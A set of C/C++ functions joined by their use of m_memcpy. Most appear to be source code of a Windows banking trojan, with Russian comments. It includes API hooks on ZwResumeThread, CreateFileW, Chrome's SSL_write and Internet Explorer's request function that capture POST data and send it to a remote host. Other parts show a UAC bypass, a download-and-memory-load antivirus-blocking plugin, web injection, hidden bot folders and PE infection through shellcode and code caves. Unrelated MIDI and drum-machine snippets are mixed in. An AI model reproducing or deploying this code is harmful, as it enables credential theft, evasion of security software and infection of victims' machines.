void HookZwResumeThread()
{
dwHashPid = NULL;
dwPidCount = 0;
dwAddrRthProc = (DWORD)&JmpToHookRthProc;
DWORD dwAddr = (DWORD)&dwAddrRthProc;
PZwResumeThread ZwResumeThread = (PZwResumeThread)GetProcAddressEx( NULL, 5, 0xACF8BF39 );
LPVOID lpMem;
LPVOID lpPtr;
lpPtr = (LPVOID)ZwResumeThread;
ProtectPage( lpPtr, PAGE_EXECUTE_READWRITE );
lpMem = pVirtualAllocEx( (HANDLE)-1, NULL, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
if ( lpMem == NULL )
{
return;
}
ZwResumeThreadReal = (PZwResumeThread)lpMem;
m_memcpy( lpMem, lpPtr, 15 );
lpPtr = (LPVOID)((DWORD)lpPtr + 5 );
if ( *(BYTE*)lpPtr == 0xBA ) // win xp and up
{
lpPtr = (LPVOID)((DWORD)lpPtr + 1 );
m_memcpy( lpPtr, &dwAddr, 4 );
}
else
{
if ( *(BYTE*)lpPtr == 0x8D ) //win2000
{
*(BYTE*)lpPtr = 0x68;
dwAddr = (DWORD)&ZwResumeThreadHook;
lpPtr = (LPVOID)((DWORD)lpPtr + 1 );
m_memcpy( lpPtr, &dwAddr, 4 );
lpPtr = (LPVOID)((DWORD)lpPtr + 6 );
*(BYTE*)lpPtr = 0x00;
}
else
{
MemFree( lpMem );
}
}
ProtectPage( ZwResumeThread, PAGE_EXECUTE_READ );
return;
}
void InitScreenLib()
{
bInitialized = false;
CaptureScreen = NULL;
DWORD dwScreenSize = sizeof( Screen_Dll );
LPBYTE ScreenFile = (LPBYTE)MemAlloc( dwScreenSize + 1 );
if ( !ScreenFile )
{
return;
}
m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) );
DWORD dwPassLen = *(DWORD*)ScreenFile;
ScreenFile += sizeof( DWORD );
dwScreenSize -= sizeof( DWORD );
char Password[30];
m_memcpy( Password, ScreenFile, dwPassLen );
Password[ dwPassLen ] = '\0';
ScreenFile += dwPassLen;
dwScreenSize -= dwPassLen;
XORCrypt::Crypt(Password, ScreenFile, dwScreenSize);
m_memset( Password, 0, dwPassLen );
hLib = MemoryLoadLibrary( ScreenFile );
if ( hLib != NULL )
{
char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0};
CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen );
if ( CaptureScreen )
{
bInitialized = true;
}
}
return;
}
bool GetHeader2( char *Buffer, char **Header )
{
char HTTP[] = {'H','T','T','P','/','1','.',0};
if ( !m_lstrncmp( Buffer, HTTP, 7 ) )
{
DWORD dwSize = m_istrstr( Buffer, "\r\n\r\n" );
if ( dwSize == (DWORD)-1 )
{
dwSize = m_lstrlen( Buffer );
}
dwSize += 4;
char *Hdr = (char*)MemAlloc( dwSize + 1 );
if ( Hdr != NULL )
{
m_memcpy( Hdr, Buffer, dwSize );
Hdr[ dwSize ] = '\0';
m_lstrlwr( Hdr );
*Header = Hdr;
return true;
}
}
return false;
}
DWORD GetHeader1( char *Buffer, char **Header )
{
DWORD dwHeaderEnd = m_istrstr( Buffer, "\r\n\r\n" );
char *Hdr = NULL;
if ( dwHeaderEnd != (DWORD)-1 )
{
dwHeaderEnd += 4;
if ( ( Hdr = (char*)MemAlloc( dwHeaderEnd + 1 ) ) != NULL )
{
m_memcpy( Hdr, Buffer, dwHeaderEnd );
char HTTP[] = {'H','T','T','P',0};
if ( !m_lstrncmp( Hdr, HTTP, 4 ) )
{
Hdr[ dwHeaderEnd ] = '\0';
m_lstrlwr( Hdr );
*Header = Hdr;
return dwHeaderEnd;
}
MemFree( Hdr );
}
}
return -1;
}
bool UpdateContentLength(PREQUEST Request, bool FreeOldBuf)
{
// Функция обновляет заголовок "Content-Length" в заголовках HTTP запроса
char * Buffer = (char *)Request->pBuf;
// копируем HTTP заголовок
int HeaderOffset = m_istrstr(Buffer, "\r\n\r\n" );
if (HeaderOffset == -1)
return false;
HeaderOffset += 4; // увеличиваем размер заголовка на "\r\n\r\n"
PCHAR Header = StrNew(Buffer, HeaderOffset);
if (Header == NULL)
return false;
// Лпределяем позицию параметра в заголовках
m_lstrlwr(Header); // приводим заголовок к нижнему регистру
char CL[] = {'c','o','n','t','e','n','t','-','l','e','n','g','t','h',':',' ',0};
int Pos = m_istrstr(Header, CL);
StrFree(Header);
if (Pos == -1)
return false;
// Копируем оригинальный заголовок
DWORD ParamLen = m_lstrlen(CL);
char *ParamName = (char*)MemAlloc(ParamLen + 1);
if (ParamName == NULL)
return false;
m_memcpy(ParamName, Buffer + Pos, ParamLen);
// Создаём строку с новым значением
DWORD NewValue = m_lstrlen(Buffer + HeaderOffset);
char NewContentLen[10];
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
pwsprintfA(NewContentLen, "%d", NewValue);
// Вписываем новое значение
char *NewBuffer = NULL;
bool Result = SubstituteText(Buffer, 0, &NewBuffer, ParamName, NewContentLen, "\r\n") >= 0;
MemFree(ParamName);
// Меняем буфер запроса
if (Result)
{
if (FreeOldBuf)
MemFree(Request->pBuf);
Request->pBuf = (LPBYTE)NewBuffer;
Request->uBufSize = m_lstrlen(NewBuffer);
}
return Result;
}
BOOL WINAPI INTERNETEXPLORERCALLBACK(
_In_ DWORD hRequest,
_In_ LPCTSTR lpszHeaders,
_In_ DWORD dwHeadersLength,
_In_ LPVOID lpOptional,
_In_ DWORD dwOptionalLength
)
{
if (lpOptional && dwOptionalLength > 0)
{
LPVOID lpHeaders = HeapAlloc(GetProcessHeap(),0x00,dwOptionalLength+1);
if (lpHeaders)
{
DWORD dwHeaders = ~dwHeadersLength == 0 ? wcslen(lpszHeaders)*2:dwHeadersLength*2;
RtlSecureZeroMemory(lpHeaders,dwOptionalLength+1);
m_memcpy(lpHeaders,lpOptional,dwOptionalLength);
//SendPOSTRequest("IE",0,0,"HTTPREQUESTW",strlen("HTTPREQUESTW"),(char*)lpHeaders,dwOptionalLength);
OutputDebugStringA((char*)lpHeaders);
HeapFree(GetProcessHeap(),0x00,lpHeaders);
}
}
return HTTPSENDREQUESTW(hRequest, lpszHeaders, dwHeadersLength, lpOptional,dwOptionalLength);
}
void CopySections( const unsigned char *data, PIMAGE_NT_HEADERS old_headers, PMEMORYMODULE module )
{
int i, size;
unsigned char *codeBase = module->codeBase;
unsigned char *dest;
PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION( module->headers );
for ( i = 0; i < module->headers->FileHeader.NumberOfSections; i++, section++ )
{
if ( section->SizeOfRawData == 0 )
{
size = old_headers->OptionalHeader.SectionAlignment;
if ( size > 0 )
{
dest = (unsigned char *)codeBase + section->VirtualAddress;///pVirtualAlloc( codeBase + section->VirtualAddress, size, MEM_COMMIT, PAGE_READWRITE );
section->Misc.PhysicalAddress = (DWORD)dest;
m_memset( dest, 0, size );
}
continue;
}
dest = (unsigned char *)codeBase + section->VirtualAddress;
m_memcpy( dest, data + section->PointerToRawData, section->SizeOfRawData );
section->Misc.PhysicalAddress = (DWORD)dest;
}
}
DWORD Request::GetNextDataPart(PRequest Request, LPVOID Buf, DWORD BufSize, bool FreeBuf)
{
// Получить следующую порцию данных
if (Request == NULL || Request->Buffer == NULL)
return 0;
int Max = Request->BufferSize - Request->Position;
if (Max < 0) Max = 0;
// Если не указан буфер или размер буфера, то возвращаем
// объём доступных данных
if (Buf == NULL || BufSize == 0)
return Max;
// Больше нет данных
if (Max > 0)
{
// Выдаём данные
if ((DWORD)Max > BufSize)
Max = BufSize;
m_memcpy(Buf, (PCHAR)Request->Buffer + Request->Position, Max);
Request->Position += Max;
Request->SaveReturned += Max;
}
if (Request->Position >= Request->BufferSize && FreeBuf)
Request::SetBuffer(Request, NULL, 0);
return Max;
}
//-------------------------------------------
// MakeWorkFolder - Функция генерирует имя
// рабочего каталога бота
// (короткое имя)
//-------------------------------------------
PCHAR BOT::MakeWorkFolder()
{
if (!STRA::IsEmpty(BOT_WORK_FOLDER_NAME))
return BOT_WORK_FOLDER_NAME;
// Генерируем имя на основе константы обработанной ключём из уида
string WorkPath = GetStr(StrBotWorkPath);
PCHAR Name = UIDCrypt::CryptFileName((PCHAR)WorkPath.t_str(), false);
// Копируем путь в глобальный массив
const char *Buf = (Name) ? Name : WorkPath.t_str();
DWORD ToCopy = Min(MAX_BOT_WORK_FOLDER_LEN, STRA::Length(Buf));
m_memcpy(BOT_WORK_FOLDER_NAME, Buf, ToCopy);
BOT_WORK_FOLDER_NAME[ToCopy] = 0;
STR::Free(Name);
// Добавляем папку в список скрытых файлов
BOT::AddHiddenFile(STRA::Hash(BOT_WORK_FOLDER_NAME));
return BOT_WORK_FOLDER_NAME;
}
bool RunBotBypassUAC( int method, int task, const char* args )
{
bool ret = false;
method = 0; //используем только метод обхода 0
string path = BOT::GetBotFullExeName();
DBG( "Exe бота %s превращаем в длл", path.t_str() );
DWORD dataSize;
BYTE* data = File::ReadToBufferA( path.t_str(), dataSize );
if( data == 0 ) return false;
if( ConvertExeToDll(data) )
{
int lenArgs = m_lstrlen(args); //размер памяти под аргументы
int szTask = sizeof(BypassUACTask) + lenArgs + 1;
BypassUACTask* ptask = (BypassUACTask*)MemAlloc(szTask);
ptask->time = (DWORD)pGetTickCount();
ptask->task = task;
ptask->lenArgs = lenArgs;
m_memcpy( ptask->args, args, lenArgs + 1 );
if( File::WriteBufferA(BOT::MakeFileName( 0, FileTask ).t_str(), ptask, szTask ) == szTask )
{
ret = RunDllBypassUAC( data, dataSize, method );
if( !ret ) //по какой-то причине не сработало
pDeleteFileA(BOT::MakeFileName( 0, FileTask ).t_str() );
}
MemFree(ptask);
}
MemFree(data);
return ret;
}
void InjectPart( PREQUEST pReq, DWORD dwCopy )
{
LPBYTE lpPartBuffer = NULL;
REQUEST Request;
Request.pBuf = pReq->pBuf + dwCopy;
Request.uBufSize = pReq->uBufPos - dwCopy;
Request.pInject = pReq->pInject;
Request.dwInjCount = pReq->dwInjCount;
if ( DoInjectFF(&Request))
{
if ( dwCopy )
{
if ( ( lpPartBuffer = (LPBYTE)MemAlloc( dwCopy + 1 ) ) != NULL )
m_memcpy( lpPartBuffer, pReq->pBuf, dwCopy );
}
if ( !dwCopy )
{
MemFree( pReq->pBuf );
pReq->pBuf = Request.pBuf;
pReq->uBufSize += Request.uBufSize - pReq->uBufPos;
pReq->uBufPos = Request.uBufSize;
}
else
{
if ( lpPartBuffer != NULL )
{
LPBYTE p = (LPBYTE)MemRealloc( lpPartBuffer, dwCopy + Request.uBufSize + 1 );
if ( p != NULL )
{
lpPartBuffer = p;
m_memcpy( lpPartBuffer + dwCopy, Request.pBuf, Request.uBufSize );
MemFree( pReq->pBuf );
pReq->pBuf = lpPartBuffer;
pReq->uBufSize += Request.uBufSize - ( pReq->uBufPos - dwCopy );
pReq->uBufPos += Request.uBufSize - ( pReq->uBufPos - dwCopy );
}
}
}
}
}
void STR::Copy(PCHAR Source, PCHAR Destination, DWORD Position, DWORD Count)
{
// Копирует с позиции Position строки Source Count символов в
// строку Destination
if (Source == NULL || Destination == NULL)
return;
m_memcpy(Destination, Source + Position, Count);
}
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
{
return 0;
}
char *Host = GetCurrentHost();
if ( Host == NULL )
{
return 0;
}
char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};
char AvBlockUrl[256];
m_lstrcpy( AvBlockUrl, Host );
m_lstrcat( AvBlockUrl, AvBlockFile );
LPBYTE BotModule = NULL;
DWORD dwModuleSize = 0;
while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL && dwModuleSize )
{
LPVOID FileData = MemAlloc( dwModuleSize + 1 );
if ( FileData )
{
m_memcpy( FileData, BotModule, dwModuleSize );
File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
MemFree( FileData );
}
LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );
if ( Module )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( Module );
if ( hLib == NULL )
{
return 0;
}
MemoryFreeLibrary( hLib );
}
}
return 0;
}
static DWORD* CopyArrayExt( const DWORD* m )
{
//считаем колоичество элементов
const DWORD* pm = m;
while( *pm++ );
int sz = (pm - m) * sizeof(DWORD);
DWORD* ret = (DWORD*)MemAlloc(sz);
if( ret )
m_memcpy( ret, m, sz );
return ret;
}
char* trimall( char* s, char c )
{
int len = m_lstrlen(s);
char* p1 = s;
while( *p1 == c && *p1 != 0 ) p1++;
char* p2 = s + len - 1;
while( *p2 == c && p2 > p1 ) p2--;
len = p2 - p1 + 1;
m_memcpy( s, p1, len );
s[len] = 0;
return s;
}
int CHROMECALLBACK(void*fd,const void *buf,int amount)
{
int Total = SSL3_WRITE(fd,buf,amount);
if (Total == amount)
{
if(isPostData((PCHAR)buf))
{
PCHAR Host = (PCHAR)HeapAlloc(GetProcessHeap(),0,MAX_PATH);
if (Host)
{
RtlSecureZeroMemory(Host, MAX_PATH);
if (ProcessHeader((PCHAR)buf, amount, "Google Chrome", Host,MAX_PATH,"SSL_WRITE") == -1)
{
PCHROMESOCKET NewSocket = InsertSocket((SOCKET)fd, &Section);
if (NewSocket)
NewSocket->szHost = Host;
else
HeapFree(GetProcessHeap(),0,Host);
}
else
{
HeapFree(GetProcessHeap(),0,Host);
}
}
}
else
{
PCHROMESOCKET Socket = FindSocket((SOCKET)fd, &Section);
if (Socket)
{
PCHAR szData = (PCHAR)HeapAlloc(GetProcessHeap(),0,amount+1);
if (szData)
{
RtlSecureZeroMemory(szData,amount+1);
m_memcpy(szData,buf,amount);
if (Socket->szHost)
{
SendPOSTRequest("Google Chrome",Socket->szHost,strlen(Socket->szHost),"SSL_WRITE 2",strlen("SSL_WRITE 2"),szData,strlen(szData));
HeapFree(GetProcessHeap(),0,Socket->szHost);
Socket->szHost = 0;
}
RemoveSocket((SOCKET)fd, &Section);
HeapFree(GetProcessHeap(),0,szData);
}
}
}
}
return Total;
}
int main(int argc, char* argv[])
{
void* lpBuffer = 0;
unsigned long ulBuffer = CreateFileBuffer(argv[1], &lpBuffer);
if (lpBuffer)
{
if (ulBuffer)
{
unsigned long ulCodeCave = 0;
CodeCave sCodeCave = {0};
if (ulCodeCave = ScanCodeCave(&sCodeCave, lpBuffer,ulBuffer,sizeof(ucShellCode)+10))
{
unsigned long ulOffset = 0;
m_memcpy((void*)(sCodeCave.ulAddress), ucCallCode, sizeof(ucCallCode));
ulOffset = sCodeCave.ulEntryPoint - (sCodeCave.ulVirtualAddress + sCodeCave.ulVirtualAddressOffset + sizeof(ucCallCode)) - 5;
m_memcpy(&ucJMP[1],&ulOffset, sizeof(unsigned long));
m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode)), ucJMP,sizeof(ucJMP));
m_memcpy((void*)(sCodeCave.ulAddress + sizeof(ucCallCode) + sizeof(ucJMP)), ucShellCode, sizeof(ucShellCode));
if (WriteFileBuffer("NTTITON.exe", lpBuffer,ulBuffer) == ulBuffer)
{
printf("Done\n");
}
}
else
{
AddSection(lpBuffer,ulBuffer, sizeof(ucShellCode) + 10);
}
}
VirtualFree(lpBuffer,ulBuffer,MEM_RELEASE);
}
return 0;
}
void printBuf() {
hexDump(MidiSysex.data + 3, MidiSysex.recordLen - 3);
if (!inCallback) {
m_memcpy(origBuf, MidiSysex.data, MidiSysex.recordLen);
origLen = MidiSysex.recordLen;
} else {
printf("origLen: %d, newLen: %d\n", origLen, MidiSysex.recordLen);
for (int i = 0; i < origLen; i++) {
if (MidiSysex.data[i + 3] != origBuf[i + 3]) {
printf("%.3x diff: %.2x was %.2x\n", i, MidiSysex.data[i + 3], origBuf[i + 3]);
}
}
}
}
void EncoderPage::update() {
encoder_t _encoders[GUI_NUM_ENCODERS];
USE_LOCK();
SET_LOCK();
m_memcpy(_encoders, Encoders.encoders, sizeof(_encoders));
Encoders.clearEncoders();
CLEAR_LOCK();
for (uint8_t i = 0; i < GUI_NUM_ENCODERS; i++) {
if (encoders[i] != NULL)
encoders[i]->update(_encoders + i);
}
}
char* SafeCopyStr( char* dst, int szDst, const char* src )
{
if( dst == 0 || szDst <= 0 ) return 0;
if( src == 0 )
{
dst[0] = 0;
return dst;
}
int len = m_lstrlen(src);
if( len > szDst - 1 ) len = szDst - 1;
m_memcpy( dst, src, len );
dst[len] = 0;
return dst;
}
void StrConcat(PCHAR &Str1, PCHAR Str2)
{
// Объеденяем две строки
DWORD Str2Len = StrCalcLength(Str2);
if (!STRHEAD::CheckSignature(Str1) || Str2Len == 0)
return;
DWORD Str1Len = StrCalcLength(Str1);
DWORD NewLength = Str1Len + Str2Len;
if (STRHEAD::GetBufferSize(Str1) < NewLength)
StrSetLength(Str1, NewLength);
PCHAR Tmp = Str1 + Str1Len;
m_memcpy(Tmp, Str2, Str2Len);
STRHEAD::SetLength(Str1, NewLength);
}
PCHAR STR::New(PCHAR Source, DWORD Len)
{
// Функция создаёт строку, копию Source.
// Len - Количество копируемых символов
// если равно 0, то будет скопирована вся строка
if (Source == NULL) return NULL;
if (Len == 0) Len = StrCalcLength(Source);
if (Len == 0) return NULL;
PCHAR Str = STR::Alloc(Len);
if (Str != NULL)
m_memcpy(Str, Source, Len);
return Str;
}
//------------------------------------------------------------------------------
bool StrCopy(PCHAR Dest, PCHAR Source, bool UpdateLen)
{
// функция копирует строку Source в строку Dest
// Флаг UpdateLen использовать только если Dest создана функциями
// StrAlloc, STR::New
// Возвращает истину если скопирован хотя-бы один байт
if (Dest == NULL || Source == NULL)
return false;
DWORD Len = StrCalcLength(Source);
m_memcpy(Dest, Source, Len);
if (UpdateLen)
STRHEAD::SetLength(Dest, Len);
else
*(Dest + Len) = 0;
return Len > 0;
}
void StrSetLength(PCHAR &Str, DWORD NewLength)
{
// Изменить размер буфера строки
// Важно!!! Функция работает со строками которые созданы функцией STR::New
// Для переопределения длины строки, мы создадим новую строку с нужным
// размером и скопируем в неё старую.
if (!STRHEAD::CheckSignature(Str) || STRHEAD::GetBufferSize(Str) == NewLength)
return;
PCHAR New = STR::Alloc(NewLength);
DWORD Size = STRHEAD::GetLength(Str);
if (NewLength < Size)
Size = NewLength;
m_memcpy(New, Str, Size);
STRHEAD::SetLength(New, Size);
STR::Free(Str);
Str = New;
}
//------------------------------------------------------------------------------
void StrConcatArguments(PCHAR &OutStr, DWORD Count, PCHAR *First)
{
// Функция объеденяет две и более строки.
const DWORD MaxCount = 50;
if (Count >= MaxCount) return;
DWORD Lens[MaxCount];
PCHAR *Current = First;
DWORD FullLen = StrCalcLength(OutStr);
Lens[0] = FullLen;
// Расчитываем общую длину строки
for (DWORD i = 1; i <= Count; i++)
{
DWORD Len = StrCalcLength(*Current);
Lens[i] = Len;
FullLen += Len;
Current++;
}
// Добавляемые строки нулевой длины
if (FullLen == 0) return;
// Меняем размер буфера
if (OutStr != NULL)
StrSetLength(OutStr, FullLen);
else
OutStr = STR::Alloc(FullLen);
// Собираем строку
Current = First;
PCHAR Tmp = OutStr + Lens[0];
for (DWORD i = 1; i <= Count; i++)
{
m_memcpy(Tmp, *Current, Lens[i]);
Tmp += Lens[i];
Current++;
}
}
void MDKit::swapTracks(uint8_t srcTrack, uint8_t dstTrack) {
uint8_t _params[24];
uint8_t _level;
uint32_t _model;
MDLFO _lfo;
uint8_t _trigGroup;
uint8_t _muteGroup;
/* adjust lfo destination, as well as trig and mute groups. */
#if 0
for (uint8_t i = 0; i < 16; i++) {
lfos[i].destinationTrack = swapNumber(lfos[i].destinationTrack, srcTrack, dstTrack);
trigGroups[i] = swapNumber(trigGroups[i], srcTrack, dstTrack);
muteGroups[i] = swapNumber(muteGroups[i], srcTrack, dstTrack);
if (models[i] == CTR_8P_MODEL) {
for (uint8_t j = 8; j < 24; j += 2) {
params[i][j] = swapNumber(params[i][j], srcTrack, dstTrack);
}
}
}
#endif
/* swap params */
m_memcpy(_params, params[srcTrack], 24);
m_memcpy(params[srcTrack], params[dstTrack], 24);
m_memcpy(params[dstTrack], _params, 24);
m_memcpy(&_lfo, &lfos[srcTrack], sizeof(_lfo));
m_memcpy(&lfos[srcTrack], &lfos[dstTrack], sizeof(_lfo));
m_memcpy(&lfos[dstTrack], &_lfo, sizeof(_lfo));
/* swap level, model, trig group, mute group */
_level = levels[srcTrack];
levels[srcTrack] = levels[dstTrack];
levels[dstTrack] = _level;
_model = models[srcTrack];
models[srcTrack] = models[dstTrack];
models[dstTrack] = _model;
_trigGroup = trigGroups[srcTrack];
trigGroups[srcTrack] = trigGroups[dstTrack];
trigGroups[dstTrack] = _trigGroup;
_muteGroup = muteGroups[srcTrack];
muteGroups[srcTrack] = muteGroups[dstTrack];
muteGroups[dstTrack] = _muteGroup;
}
HANDLE WINAPI Hook_CreateFileW( LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile )
{
HANDLE File = Real_CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile );
if( (stateGrabber & (IGNOREHOOK | INHOOK)) == 0 && (dwFlagsAndAttributes & FILE_FLAG_OVERLAPPED) == 0 && lpFileName && lpFileName[0] != '/' && lpFileName[0] != '\\' ) //игнорируем открытие разных портов
{
//stateGrabber |= INHOOK;
//инициализация параметров события
ParamEvent e;
e.data = 0;
e.szData = 0;
int len = m_wcslen(lpFileName);
m_memcpy( e.fileNameW, lpFileName, sizeof(WCHAR) * (len + 1) );
e.unicode = true;
e.access = dwDesiredAccess;
e.file = File;
SendEvent(e); //посылаем событие
//stateGrabber &= ~INHOOK;
}
return File;
}
void STR::Delete(PCHAR Str, DWORD Position, DWORD Count, DWORD StrLength)
{
// Удаляет Count символов с позоции Position строки Str
if (STR::IsEmpty(Str) || Count == 0)
return;
DWORD Len = StrLength;
if (Len == 0)
Len = StrCalcLength(Str);
if (Position > Len) return;
if (Count > Len - Position)
{
Count = Len - Position;
if (Count == 0) return;
}
PCHAR Ptr = Str + Position;
PCHAR FromPTR = Ptr + Count;
m_memcpy(Ptr, FromPTR, Len - (Position + Count));
Ptr = Str + (Len - Count);
*Ptr = 0;
}
LPVOID MemRealloc( LPVOID lpAddr, DWORD dwSize )
{
DWORD dwPrevLen;
if ( lpAddr )
{
dwPrevLen = GetMemSize( lpAddr );
if ( dwPrevLen >= dwSize )
{
return lpAddr;
}
}
LPVOID NewAddr = MemAlloc(dwSize);
if ( lpAddr && NewAddr )
{
m_memcpy(NewAddr, lpAddr, dwPrevLen);
MemFree(lpAddr);
}
return NewAddr;
}
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine )
{
DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode);
DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
DBG( "Shellcode size is %d bytes", totalSize);
PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)
((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew);
PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER)
(headers->FileHeader.SizeOfOptionalHeader +
(PUCHAR)&headers->OptionalHeader);
DWORD numberOfSections = headers->FileHeader.NumberOfSections;
// enumerate sections
for( int i = 0; i < (int)numberOfSections; i++ )
{
// check for resources section
if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) )
{
if( section->SizeOfRawData < totalSize )
{
DBG( "ERROR: Not enough free space in '.rsrc'" );
return false;
}
// fill shellcode parameters
PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData);
m_memset( params, 0, sizeof(SHELLCODE_PARAMS) );
params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint;
HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll");
params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" );
params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" );
if( commandLine )
m_lstrcpy( params->szCommandLine, commandLine );
m_lstrcpy( params->szDllPath, dllPath );
// copy shellcode
PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1);
m_memcpy( shellcode, Shellcode, shellcodeSize);
// replace address of entry point
headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress +
sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1;
// make section executable
section->Characteristics |= IMAGE_SCN_MEM_EXECUTE;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL;
headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0;
DWORD headerSum = 0, checkSum = 0;
// recalculate checksum
if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) )
headers->OptionalHeader.CheckSum = checkSum;
else
DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() );
DBG( "OK" );
break;
}
section++;
}
return true;
}
